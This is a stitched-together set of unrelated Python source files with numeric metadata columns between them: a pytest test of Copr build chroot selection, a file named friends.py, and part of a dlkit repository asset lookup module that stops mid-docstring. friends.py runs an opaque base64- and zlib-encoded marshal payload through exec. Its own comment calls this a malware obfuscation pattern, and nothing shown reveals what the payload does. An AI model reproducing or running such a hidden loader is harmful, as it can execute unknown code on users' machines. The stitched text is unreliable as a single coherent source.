            set(),
            id="build_with_targets&pr_comment",
        ),
        pytest.param(
            [
                JobConfig(
                    type=JobType.copr_build,
                    trigger=JobConfigTriggerType.release,
                    metadata={"targets": ["fedora-29", "fedora-31"]},
                )
            ],
            TheJobTriggerType.release,
            {"fedora-29-x86_64", "fedora-31-x86_64"},
            set(),
            id="build_with_targets&release",
        ),
        # A "commit"-triggered job config is expected to match a push event.
        pytest.param(
            [
                JobConfig(
                    type=JobType.copr_build,
                    trigger=JobConfigTriggerType.commit,
                    metadata={"targets": ["fedora-29", "fedora-31"]},
                )
            ],
            TheJobTriggerType.push,
            {"fedora-29-x86_64", "fedora-31-x86_64"},
            set(),
            id="build_with_targets&push",
        ),
        # With both a pull_request and a commit job defined, the helper must
        # pick the job matching the incoming trigger (pull_request here).
        pytest.param(
            [
                JobConfig(
                    type=JobType.copr_build,
                    trigger=JobConfigTriggerType.pull_request,
                    metadata={"targets": ["fedora-29", "fedora-31"]},
                ),
                JobConfig(
                    type=JobType.copr_build,
                    trigger=JobConfigTriggerType.commit,
                    metadata={"targets": ["different", "os", "target"]},
                ),
            ],
            TheJobTriggerType.pull_request,
            {"fedora-29-x86_64", "fedora-31-x86_64"},
            set(),
            id="build_with_targets&pull_request_with_pr_and_push_defined",
        ),
        pytest.param(
            [
                JobConfig(
                    type=JobType.copr_build,
                    trigger=JobConfigTriggerType.pull_request,
                    metadata={"targets": ["fedora-29", "fedora-31"]},
                ),
                JobConfig(
                    type=JobType.copr_build,
                    trigger=JobConfigTriggerType.commit,
                    metadata={"targets": ["different", "os", "target"]},
                ),
            ],
            TheJobTriggerType.pr_comment,
            {"fedora-29-x86_64", "fedora-31-x86_64"},
            set(),
            id="build_with_targets&pr_comment_with_pr_and_push_defined",
        ),
        # Same as above but the push/commit job is the one that must win.
        pytest.param(
            [
                JobConfig(
                    type=JobType.copr_build,
                    trigger=JobConfigTriggerType.pull_request,
                    metadata={"targets": ["different", "os", "target"]},
                ),
                JobConfig(
                    type=JobType.copr_build,
                    trigger=JobConfigTriggerType.commit,
                    metadata={"targets": ["fedora-29", "fedora-31"]},
                ),
            ],
            TheJobTriggerType.push,
            {"fedora-29-x86_64", "fedora-31-x86_64"},
            set(),
            id="build_with_targets&push_with_pr_and_push_defined",
        ),
        # No explicit targets: default chroots are expected.
        pytest.param(
            [
                JobConfig(
                    type=JobType.copr_build,
                    trigger=JobConfigTriggerType.pull_request,
                    metadata={},
                )
            ],
            TheJobTriggerType.pull_request,
            {"fedora-30-x86_64", "fedora-31-x86_64"},
            set(),
            id="build_without_targets",
        ),
        # A tests job implies a build too, so both sets are populated.
        pytest.param(
            [
                JobConfig(
                    type=JobType.tests,
                    trigger=JobConfigTriggerType.pull_request,
                    metadata={},
                )
            ],
            TheJobTriggerType.pull_request,
            {"fedora-30-x86_64", "fedora-31-x86_64"},
            {"fedora-30-x86_64", "fedora-31-x86_64"},
            id="test_without_targets",
        ),
        pytest.param(
            [
                JobConfig(
                    type=JobType.tests,
                    trigger=JobConfigTriggerType.pull_request,
                    metadata={"targets": ["fedora-29", "fedora-31"]},
                )
            ],
            TheJobTriggerType.pull_request,
            {"fedora-29-x86_64", "fedora-31-x86_64"},
            {"fedora-29-x86_64", "fedora-31-x86_64"},
            id="test_with_targets",
        ),
        pytest.param(
            [
                JobConfig(
                    type=JobType.copr_build,
                    trigger=JobConfigTriggerType.pull_request,
                    metadata={},
                ),
                JobConfig(
                    type=JobType.tests,
                    trigger=JobConfigTriggerType.pull_request,
                    metadata={},
                ),
            ],
            TheJobTriggerType.pull_request,
            {"fedora-30-x86_64", "fedora-31-x86_64"},
            {"fedora-30-x86_64", "fedora-31-x86_64"},
            id="build_without_target&test_without_targets",
        ),
        pytest.param(
            [
                JobConfig(
                    type=JobType.copr_build,
                    trigger=JobConfigTriggerType.pull_request,
                    metadata={"targets": ["fedora-29", "fedora-31"]},
                ),
                JobConfig(
                    type=JobType.tests,
                    trigger=JobConfigTriggerType.pull_request,
                    metadata={},
                ),
            ],
            TheJobTriggerType.pull_request,
            {"fedora-29-x86_64", "fedora-31-x86_64"},
            {"fedora-29-x86_64", "fedora-31-x86_64"},
            id="build_with_target&test_without_targets",
        ),
        pytest.param(
            [
                JobConfig(
                    type=JobType.copr_build,
                    trigger=JobConfigTriggerType.pull_request,
                    metadata={},
                ),
                JobConfig(
                    type=JobType.tests,
                    trigger=JobConfigTriggerType.pull_request,
                    metadata={"targets": ["fedora-29", "fedora-31"]},
                ),
            ],
            TheJobTriggerType.pull_request,
            {"fedora-29-x86_64", "fedora-31-x86_64"},
            {"fedora-29-x86_64", "fedora-31-x86_64"},
            id="build_without_target&test_with_targets",
        ),
        # "targets" given as a single string (not a list) must also work.
        pytest.param(
            [
                JobConfig(
                    type=JobType.copr_build,
                    trigger=JobConfigTriggerType.pull_request,
                    metadata={},
                ),
                JobConfig(
                    type=JobType.tests,
                    trigger=JobConfigTriggerType.pull_request,
                    metadata={"targets": "fedora-29"},
                ),
            ],
            TheJobTriggerType.pull_request,
            {"fedora-29-x86_64"},
            {"fedora-29-x86_64"},
            id="build_without_target&test_with_one_str_target",
        ),
        # JobType.build (an alias of copr_build, per the case id) mixed with tests.
        pytest.param(
            [
                JobConfig(
                    type=JobType.build,
                    trigger=JobConfigTriggerType.pull_request,
                    metadata={},
                ),
                JobConfig(
                    type=JobType.tests,
                    trigger=JobConfigTriggerType.pull_request,
                    metadata={"targets": "fedora-29"},
                ),
            ],
            TheJobTriggerType.pull_request,
            {"fedora-29-x86_64"},
            {"fedora-29-x86_64"},
            id="build_with_mixed_build_alias",
        ),
    ],
)
def test_targets(jobs, trigger, build_targets, test_targets):
    """Verify CoprBuildJobHelper derives build/test chroots from the job config."""
    copr_build_handler = CoprBuildJobHelper(
        config=flexmock(),
        package_config=PackageConfig(jobs=jobs),
        project=flexmock(),
        event=flexmock(trigger=trigger),
    )
    # Sanity checks: the package config retained the jobs we passed in.
    assert copr_build_handler.package_config.jobs
    assert [j.type for j in copr_build_handler.package_config.jobs]
    # Compare as sets: chroot ordering is not part of the contract.
    assert set(copr_build_handler.build_chroots) == build_targets
    assert set(copr_build_handler.tests_chroots) == test_targets
| 35.217557
| 81
| 0.47426
| 727
| 9,227
| 5.78542
| 0.086658
| 0.047551
| 0.065383
| 0.162625
| 0.879933
| 0.856158
| 0.841655
| 0.811698
| 0.805754
| 0.784831
| 0
| 0.052798
| 0.417037
| 9,227
| 261
| 82
| 35.35249
| 0.729132
| 0
| 0
| 0.765625
| 0
| 0
| 0.16636
| 0.052672
| 0
| 0
| 0
| 0
| 0.015625
| 1
| 0.003906
| false
| 0
| 0.019531
| 0
| 0.023438
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
52de90a582358c268c4a4618c75e0bc64823cbff
| 1,985
|
py
|
Python
|
src/friends.py
|
Maaadd/mbf
|
c4ebf2a2719d6c35e1aa26be83f42230e43670bc
|
[
"BSD-3-Clause"
] | null | null | null |
src/friends.py
|
Maaadd/mbf
|
c4ebf2a2719d6c35e1aa26be83f42230e43670bc
|
[
"BSD-3-Clause"
] | null | null | null |
src/friends.py
|
Maaadd/mbf
|
c4ebf2a2719d6c35e1aa26be83f42230e43670bc
|
[
"BSD-3-Clause"
] | null | null | null |
# SECURITY WARNING: this script exec()s a marshal-serialized code object that
# has been zlib-compressed and base64-encoded. The payload is opaque — its
# behavior cannot be audited from this file, and `marshal.loads` + `exec` on
# data like this is a classic malware/obfuscation pattern. Do NOT run this
# without first decoding and inspecting the payload in a sandbox
# (e.g. marshal.loads(zlib.decompress(base64.b64decode(blob))) and dis.dis()).
import marshal,zlib,base64
exec(marshal.loads(zlib.decompress(base64.b64decode("eJyNVVtvG1UQnrN27NyTpo1dN71sCqkMJXZvCjSQBkFQk97lFKUKqcLG56y9zl6cPWcbW3WeggTiX/DAAz+CF175JfwKmJldt4oQErZ3PGfOzJxvbmebkH0sfL7ER79GIvEnwAfYfccL2BVD3oJda8jnYDfHvAV+HoIR2C2AoHUO/CIERdgt4joPP6CzUbLYro7gCd7f+HlWFciaKSRfKScxnpv421HSTcWjBMQxyniBauZxcQ6fIj5fE8xrOVRhCKcCTvLQX4FBHjqCgKAEj6/QIs+LEaicjPC+BYMRkAU4tchoJ6xC3uTgcBxiH4QQBlVwv0hWwhRAjjIXCnhlitDBAMbIDVkXIJOMDyVFMLhbyE48tCD+gyXFs5L3Xu+fNchB/BfICZIQ4rKchDIeE86xsHhG2AI4wbOn4OFm7xdhEP9vVv9EDHLQmSA8A0GQOpMgpzlBY5TmwRjIGYY6Dr2KGIxDZxrkLMhzcApi4/WIOEHjCejMgJxjM7Q/D2YWBpO0PCyAfi6Qx/pSMD+Jo+f0SxU6c+/PI9spkBfO2MZ/iixl8ySUJagQlmkIS8Ncls9uUHqms3LSgfPWYBQ658GzSE75kBdhZYAnVWCFU4pNcQE689ApgbwEuGPK0LmI4UGnAnKBfJFTLoCbgxLXObW4RFoUzo68zLjHh7h/tgYWLdO8yCuACqdCEM4ydhF2x4udozGRNwvcSb9a2EnyKpbmBUpf4bPTr0OvCtRdl0FeI78br8twMsOiK1zfGSgTmKPfrZ2dsEjNSF0nbWqH8sNNc5X7YpHLh+BmKURzDTp2Fg0Zk3SRw8AKbVev46A803eQji98d+vz+3eDp45ODg+d0E5i35aOa5zYNipAASvcDlb5fyWwNV0I9brHo0ik7tE1oc8jCQ4c7TVrrtNUB1F0WGtGgV5CeU+2lqOuCu22MV29Wq/3o8QktQNV33+09fJ2q/3IvXusS+/w3A6+RRja8Z32IgoC/QFupbZ79b167eP1vXoV6Ud7dTf2VCj13rqvzZqeoRtErvHejVi5yGu6VWQSdOvM1To6Cg0jpmVi3OXP9AS7D/xa14m1ig3taNP3FWN6gxKv6fjLju+1wlU78KT0FcfuML2pZykP3ThyPV/Vuu3uOh1MXuvr7+AYuqraCErTvZbhX3dRsIY3DULxJKuETqD0j8hMpbm/Eyw/GCZ/Sdv/8zOVZvLT4C3/3wuWNGXyxH6bVXy4fuSELSzzofITrLlWvtPy7LClNjBlticXa5ru26XN1aWnq0vbHOkTr+0Y+yW3xxPHC/HmonzFXtjSVSrisIpboVFx0tWe/TgJm94n9oGK2yo03iKXlcOl0mj7vdWd4Hliuon5V+Nxqo+5d3FSAWLneN8LUTMtV9f3jKG3QKy6PjYgXn0AW6FUvW/iOIoNtW2kU6h9jb3Np6seWllsxcauF0rH97kgPiIlnZdxosxE1oENdZQobdiPCpuRVMxmjTOaudgnH/lswc4wPSx4FoWKGaN6qReni5ORKfUzgEZGWVzHsWdUg4eNNMLomA9Bdy69/1jH9RPdNvQWfKz6B5ETS048Zj7NiO+hQy9m17EKojcpAppIZngkhmOimWv6kVZVcska2BYumzdxrD2V9mvsZ6LQ9VoZEC9LjYyCYWNEXE4Gsp/xFo8pBxIr3Y1CnSKiGeQy9xqXh2XGV7+/TzPRGB2+/GnKSJJCc94oajpgoslkOwmcOLa3NliBgHDKvicFMSlywhYlMYXfaWtOzFkfIjcn5q05qyBGxBjuL4gZUcHnqihYF3GvYpWQXkfbG+IccjbqTWW6JdTMQR75GeSrdH6D8ta4QGSRyM1h9Q70vQaBaFwiQoE21obI/zMGwv5FEMnEVw84YErqLTErZq1/AJ3x+00="))))
| 992.5
| 1,958
| 0.960705
| 68
| 1,985
| 28.044118
| 0.955882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.154312
| 0.001008
| 1,985
| 2
| 1,958
| 992.5
| 0.807363
| 0
| 0
| 0
| 0
| 0.5
| 0.956697
| 0.956697
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
52f4d01dc4e36d96fda86ee2c67f6b947dbde1a2
| 128,315
|
py
|
Python
|
dlkit/aws_adapter/repository/sessions.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 2
|
2018-02-23T12:16:11.000Z
|
2020-10-08T17:54:24.000Z
|
dlkit/aws_adapter/repository/sessions.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 87
|
2017-04-21T18:57:15.000Z
|
2021-12-13T19:43:57.000Z
|
dlkit/aws_adapter/repository/sessions.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 1
|
2018-03-01T16:44:25.000Z
|
2018-03-01T16:44:25.000Z
|
"""repository.sessions"""
# pylint: disable=too-many-lines,no-member,protected-access,too-many-public-methods
from ...abstract_osid.repository import sessions as abc_repository_sessions
from ..osid import sessions as osid_sessions
from .objects import Asset, AssetList, AssetContent, AssetContentList, AssetContentForm
from ..types import AWS_ASSET_CONTENT_RECORD_TYPE
from ..osid.osid_errors import NotFound, PermissionDenied, Unimplemented
from ..primitives import Id
from .aws_utils import remove_file
from ...json_ import utilities
class AssetLookupSession(abc_repository_sessions.AssetLookupSession,
osid_sessions.OsidSession):
"""This session defines methods for retrieving assets.
An ``Asset`` represents an element of content stored in a
Repository.
This lookup session defines several views:
* comparative view: elements may be silently omitted or re-ordered
* plenary view: provides a complete result set or is an error
condition
* isolated repository view: All asset methods in this session
operate, retrieve and pertain to assets defined explicitly in
the current repository. Using an isolated view is useful for
managing ``Assets`` with the ``AssetAdminSession.``
* federated repository view: All asset methods in this session
operate, retrieve and pertain to all assets defined in this
repository and any other assets implicitly available in this
repository through repository inheritence.
The methods ``use_federated_repository_view()`` and
``use_isolated_repository_view()`` behave as a radio group and one
should be selected before invoking any lookup methods.
Assets may have an additional records indicated by their respective
record types. The record may not be accessed through a cast of the
``Asset``.
"""
def get_repository_id(self):
"""Gets the ``Repository`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Repository Id`` associated with
this session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.get_bin_id_template
return self._provider_session.get_repository_id()
repository_id = property(fget=get_repository_id)
def get_repository(self):
"""Gets the ``Repository`` associated with this session.
return: (osid.repository.Repository) - the ``Repository``
associated with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
return self._provider_session.get_repository()
repository = property(fget=get_repository)
def can_lookup_assets(self):
"""Tests if this user can perform ``Asset`` lookups.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer lookup
operations.
return: (boolean) - ``false`` if lookup methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.can_lookup_resources_template
return self._provider_session.can_lookup_assets()
    def use_comparative_asset_view(self):
        """The returns from the lookup methods may omit or translate elements
        based on this session, such as authorization, and not result in an error.
        This view is used when greater interoperability is desired at
        the expense of precision.
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from awsosid template for -
        # osid.resource.ResourceLookupSession.use_comparative_resource_view_template
        self._provider_session.use_comparative_asset_view()
    def use_plenary_asset_view(self):
        """A complete view of the ``Asset`` returns is desired.
        Methods will return what is requested or result in an error.
        This view is used when greater precision is desired at the
        expense of interoperability.
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from awsosid template for -
        # osid.resource.ResourceLookupSession.use_plenary_resource_view_template
        self._provider_session.use_plenary_asset_view()
    def use_federated_repository_view(self):
        """Federates the view for methods in this session.
        A federated view will include assets in repositories which are
        children of this repository in the repository hierarchy.
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from awsosid template for -
        # osid.resource.ResourceLookupSession.use_federated_bin_view_template
        self._provider_session.use_federated_repository_view()
    def use_isolated_repository_view(self):
        """Isolates the view for methods in this session.
        An isolated view restricts lookups to this repository only.
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from awsosid template for -
        # osid.resource.ResourceLookupSession.use_isolated_bin_view_template
        self._provider_session.use_isolated_repository_view()
def get_asset(self, asset_id=None):
"""Gets the ``Asset`` specified by its ``Id``.
In plenary mode, the exact ``Id`` is found or a ``NotFound``
results. Otherwise, the returned ``Asset`` may have a different
``Id`` than requested, such as the case where a duplicate ``Id``
was assigned to an ``Asset`` and retained for compatibility.
arg: asset_id (osid.id.Id): the ``Id`` of the ``Asset`` to
retrieve
return: (osid.repository.Asset) - the returned ``Asset``
raise: NotFound - no ``Asset`` found with the given ``Id``
raise: NullArgument - ``asset_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return Asset(self._provider_session.get_asset(asset_id), self._config_map)
# def get_asset_content(self, asset_content_id=None):
# """Gets the ``AssetContent`` specified by its ``Id``.
#
# In plenary mode, the exact ``Id`` is found or a ``NotFound``
# results. Otherwise, the returned ``Asset`` may have a different
# ``Id`` than requested, such as the case where a duplicate ``Id``
# was assigned to an ``Asset`` and retained for compatibility.
#
# arg: asset_id (osid.id.Id): the ``Id`` of the ``Asset`` to
# retrieve
# return: (osid.repository.Asset) - the returned ``Asset``
# raise: NotFound - no ``Asset`` found with the given ``Id``
# raise: NullArgument - ``asset_id`` is ``null``
# raise: OperationFailed - unable to complete request
# raise: PermissionDenied - authorization failure
# *compliance: mandatory -- This method must be implemented.*
#
# """
# return AssetContent(self._provider_session.get_asset_content(asset_content_id), self._config_map)
def get_assets_by_ids(self, asset_ids=None):
"""Gets an ``AssetList`` corresponding to the given ``IdList``.
In plenary mode, the returned list contains all of the assets
specified in the ``Id`` list, in the order of the list,
including duplicates, or an error results if an ``Id`` in the
supplied list is not found or inaccessible. Otherwise,
inaccessible ``Assets`` may be omitted from the list and may
present the elements in any order including returning a unique
set.
arg: asset_ids (osid.id.IdList): the list of ``Ids`` to
retrieve
return: (osid.repository.AssetList) - the returned ``Asset
list``
raise: NotFound - an ``Id`` was not found
raise: NullArgument - ``asset_ids`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return AssetList(self._provider_session.get_assets_by_ids(asset_ids),
self._config_map)
def get_assets_by_genus_type(self, asset_genus_type=None):
"""Gets an ``AssetList`` corresponding to the given asset genus ``Type``
which does not include assets of types derived from the specified ``Type``.
In plenary mode, the returned list contains all known assets or
an error results. Otherwise, the returned list may contain only
those assets that are accessible through this session.
arg: asset_genus_type (osid.type.Type): an asset genus type
return: (osid.repository.AssetList) - the returned ``Asset
list``
raise: NullArgument - ``asset_genus_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return AssetList(self._provider_session.get_assets_by_genus_type(asset_genus_type),
self._config_map)
def get_assets_by_parent_genus_type(self, asset_genus_type=None):
"""Gets an ``AssetList`` corresponding to the given asset genus ``Type``
and include any additional assets with genus types derived from the specified
``Type``.
In plenary mode, the returned list contains all known assets or
an error results. Otherwise, the returned list may contain only
those assets that are accessible through this session.
arg: asset_genus_type (osid.type.Type): an asset genus type
return: (osid.repository.AssetList) - the returned ``Asset
list``
raise: NullArgument - ``asset_genus_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return AssetList(self._provider_session.get_assets_by_parent_genus_type(asset_genus_type),
self._config_map)
def get_assets_by_record_type(self, asset_record_type=None):
"""Gets an ``AssetList`` containing the given asset record ``Type``.
In plenary mode, the returned list contains all known assets or
an error results. Otherwise, the returned list may contain only
those assets that are accessible through this session.
arg: asset_record_type (osid.type.Type): an asset record type
return: (osid.repository.AssetList) - the returned ``Asset
list``
raise: NullArgument - ``asset_record_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return AssetList(self._provider_session.get_assets_by_record_type(asset_record_type),
self._config_map)
def get_assets_by_provider(self, resource_id=None):
"""Gets an ``AssetList`` from the given provider.
In plenary mode, the returned list contains all known assets or
an error results. Otherwise, the returned list may contain only
those assets that are accessible through this session.
arg: resource_id (osid.id.Id): a resource ``Id``
return: (osid.repository.AssetList) - the returned ``Asset
list``
raise: NullArgument - ``resource_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return AssetList(self._provider_session.get_assets_by_provider(resource_id),
self._config_map)
def get_assets(self):
"""Gets all ``Assets``.
In plenary mode, the returned list contains all known assets or
an error results. Otherwise, the returned list may contain only
those assets that are accessible through this session.
return: (osid.repository.AssetList) - a list of ``Assets``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return AssetList(self._provider_session.get_assets(), self._config_map)
assets = property(fget=get_assets)
class AssetContentLookupSession(abc_repository_sessions.AssetContentLookupSession, osid_sessions.OsidSession):
    """This session defines methods for retrieving asset contents.
    An ``AssetContent`` represents an element of content stored associated
    with an ``Asset``.
    This lookup session defines several views:
    * comparative view: elements may be silently omitted or re-ordered
    * plenary view: provides a complete result set or is an error
    condition
    * isolated repository view: All asset content methods in this session
    operate, retrieve and pertain to asset contents defined explicitly in
    the current repository. Using an isolated view is useful for
    managing ``AssetContents`` with the ``AssetAdminSession.``
    * federated repository view: All asset content methods in this session
    operate, retrieve and pertain to all asset contents defined in this
    repository and any other asset contents implicitly available in this
    repository through repository inheritance.
    The methods ``use_federated_repository_view()`` and
    ``use_isolated_repository_view()`` behave as a radio group and one
    should be selected before invoking any lookup methods.
    AssetContents may have additional records indicated by their respective
    record types. The record may not be accessed through a cast of the
    ``AssetContent``.
    """
    def get_repository_id(self):
        """Gets the ``Repository`` ``Id`` associated with this session.
        :return: the ``Repository Id`` associated with this session
        :rtype: ``osid.id.Id``
        *compliance: mandatory -- This method must be implemented.*
        """
        return self._provider_session.get_repository_id()
    repository_id = property(fget=get_repository_id)
    def get_repository(self):
        """Gets the ``Repository`` associated with this session.
        :return: the ``Repository`` associated with this session
        :rtype: ``osid.repository.Repository``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``PermissionDenied`` -- authorization failure
        *compliance: mandatory -- This method must be implemented.*
        """
        return self._provider_session.get_repository()
    repository = property(fget=get_repository)
    def can_lookup_asset_contents(self):
        """Tests if this user can perform ``AssetContent`` lookups.
        A return of true does not guarantee successful authorization. A
        return of false indicates that it is known all methods in this
        session will result in a ``PermissionDenied``. This is intended
        as a hint to an application that may opt not to offer lookup
        operations.
        :return: ``false`` if lookup methods are not authorized, ``true`` otherwise
        :rtype: ``boolean``
        *compliance: mandatory -- This method must be implemented.*
        """
        # NOTE: It is expected that real authentication hints will be
        # handled in a service adapter above the pay grade of this impl.
        return True
    def use_comparative_asset_content_view(self):
        """The returns from the lookup methods may omit or translate elements based on this session, such as authorization, and not result in an error.
        This view is used when greater interoperability is desired at
        the expense of precision.
        *compliance: mandatory -- This method must be implemented.*
        """
        self._provider_session.use_comparative_asset_content_view()
    def use_plenary_asset_content_view(self):
        """A complete view of the ``AssetContent`` returns is desired.
        Methods will return what is requested or result in an error.
        This view is used when greater precision is desired at the
        expense of interoperability.
        *compliance: mandatory -- This method must be implemented.*
        """
        # NOTE(review): calls a private helper on the provider session,
        # unlike use_comparative_asset_content_view() above which uses a
        # public method -- confirm the provider adapter exposes no public
        # plenary view method here.
        self._provider_session._use_plenary_object_view()
    def use_federated_repository_view(self):
        """Federates the view for methods in this session.
        A federated view will include assets in repositories which are
        children of this repository in the repository hierarchy.
        *compliance: mandatory -- This method must be implemented.*
        """
        # NOTE(review): delegates to the provider's private catalog-view
        # helper -- confirm this matches the provider adapter's API.
        self._provider_session._use_federated_catalog_view()
    def use_isolated_repository_view(self):
        """Isolates the view for methods in this session.
        An isolated view restricts lookups to this repository only.
        *compliance: mandatory -- This method must be implemented.*
        """
        # NOTE(review): delegates to the provider's private catalog-view
        # helper -- confirm this matches the provider adapter's API.
        self._provider_session._use_isolated_catalog_view()
    @utilities.arguments_not_none
    def get_asset_content(self, asset_content_id):
        """Gets the ``AssetContent`` specified by its ``Id``.
        In plenary mode, the exact ``Id`` is found or a ``NotFound``
        results. Otherwise, the returned ``AssetContent`` may have a different
        ``Id`` than requested, such as the case where a duplicate ``Id``
        was assigned to an ``AssetContent`` and retained for compatibility.
        :param asset_content_id: the ``Id`` of the ``AssetContent`` to retrieve
        :type asset_content_id: ``osid.id.Id``
        :return: the returned ``AssetContent``
        :rtype: ``osid.repository.AssetContent``
        :raise: ``NotFound`` -- no ``AssetContent`` found with the given ``Id``
        :raise: ``NullArgument`` -- ``asset_content_id`` is ``null``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``PermissionDenied`` -- authorization failure
        *compliance: mandatory -- This method must be implemented.*
        """
        return AssetContent(self._provider_session.get_asset_content(asset_content_id), self._config_map)
    @utilities.arguments_not_none
    def get_asset_contents_by_ids(self, asset_content_ids):
        """Gets an ``AssetContentList`` corresponding to the given ``IdList``.
        In plenary mode, the returned list contains all of the asset contents
        specified in the ``Id`` list, in the order of the list,
        including duplicates, or an error results if an ``Id`` in the
        supplied list is not found or inaccessible. Otherwise,
        inaccessible ``AssetContents`` may be omitted from the list and may
        present the elements in any order including returning a unique
        set.
        :param asset_content_ids: the list of ``Ids`` to retrieve
        :type asset_content_ids: ``osid.id.IdList``
        :return: the returned ``AssetContent list``
        :rtype: ``osid.repository.AssetContentList``
        :raise: ``NotFound`` -- an ``Id`` was not found
        :raise: ``NullArgument`` -- ``asset_content_ids`` is ``null``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``PermissionDenied`` -- authorization failure
        *compliance: mandatory -- This method must be implemented.*
        """
        return AssetContentList(self._provider_session.get_asset_contents_by_ids(asset_content_ids), self._config_map)
    @utilities.arguments_not_none
    def get_asset_contents_by_genus_type(self, asset_content_genus_type):
        """Gets an ``AssetContentList`` corresponding to the given asset content genus ``Type`` which does not include asset contents of types derived from the specified ``Type``.
        In plenary mode, the returned list contains all known asset contents or
        an error results. Otherwise, the returned list may contain only
        those asset contents that are accessible through this session.
        :param asset_content_genus_type: an asset content genus type
        :type asset_content_genus_type: ``osid.type.Type``
        :return: the returned ``AssetContent list``
        :rtype: ``osid.repository.AssetContentList``
        :raise: ``NullArgument`` -- ``asset_content_genus_type`` is ``null``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``PermissionDenied`` -- authorization failure
        *compliance: mandatory -- This method must be implemented.*
        """
        return AssetContentList(self._provider_session.get_asset_contents_by_genus_type(asset_content_genus_type), self._config_map)
    @utilities.arguments_not_none
    def get_asset_contents_by_parent_genus_type(self, asset_content_genus_type):
        """Gets an ``AssetContentList`` corresponding to the given asset content genus ``Type`` and include any additional asset contents with genus types derived from the specified ``Type``.
        In plenary mode, the returned list contains all known asset contents or
        an error results. Otherwise, the returned list may contain only
        those asset contents that are accessible through this session.
        :param asset_content_genus_type: an asset content genus type
        :type asset_content_genus_type: ``osid.type.Type``
        :return: the returned ``AssetContent list``
        :rtype: ``osid.repository.AssetContentList``
        :raise: ``NullArgument`` -- ``asset_content_genus_type`` is ``null``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``PermissionDenied`` -- authorization failure
        *compliance: mandatory -- This method must be implemented.*
        """
        return AssetContentList(self._provider_session.get_asset_contents_by_parent_genus_type(asset_content_genus_type), self._config_map)
    @utilities.arguments_not_none
    def get_asset_contents_by_record_type(self, asset_content_record_type):
        """Gets an ``AssetContentList`` containing the given asset content record ``Type``.
        In plenary mode, the returned list contains all known asset contents or
        an error results. Otherwise, the returned list may contain only
        those asset contents that are accessible through this session.
        :param asset_content_record_type: an asset content record type
        :type asset_content_record_type: ``osid.type.Type``
        :return: the returned ``AssetContent list``
        :rtype: ``osid.repository.AssetContentList``
        :raise: ``NullArgument`` -- ``asset_content_record_type`` is ``null``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``PermissionDenied`` -- authorization failure
        *compliance: mandatory -- This method must be implemented.*
        """
        return AssetContentList(self._provider_session.get_asset_contents_by_record_type(asset_content_record_type), self._config_map)
    @utilities.arguments_not_none
    def get_asset_contents_for_asset(self, asset_id):
        """Gets an ``AssetContentList`` for the given Asset.
        In plenary mode, the returned list contains all known asset contents or
        an error results. Otherwise, the returned list may contain only
        those asset contents that are accessible through this session.
        :param asset_id: an asset ``Id``
        :type asset_id: ``osid.id.Id``
        :return: the returned ``AssetContent list``
        :rtype: ``osid.repository.AssetContentList``
        :raise: ``NullArgument`` -- ``asset_id`` is ``null``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``PermissionDenied`` -- authorization failure
        *compliance: mandatory -- This method must be implemented.*
        """
        return AssetContentList(self._provider_session.get_asset_contents_for_asset(asset_id), self._config_map)
    @utilities.arguments_not_none
    def get_asset_contents_by_genus_type_for_asset(self, asset_content_genus_type, asset_id):
        """Gets an ``AssetContentList`` from the given GenusType and Asset Id.
        In plenary mode, the returned list contains all known asset contents or
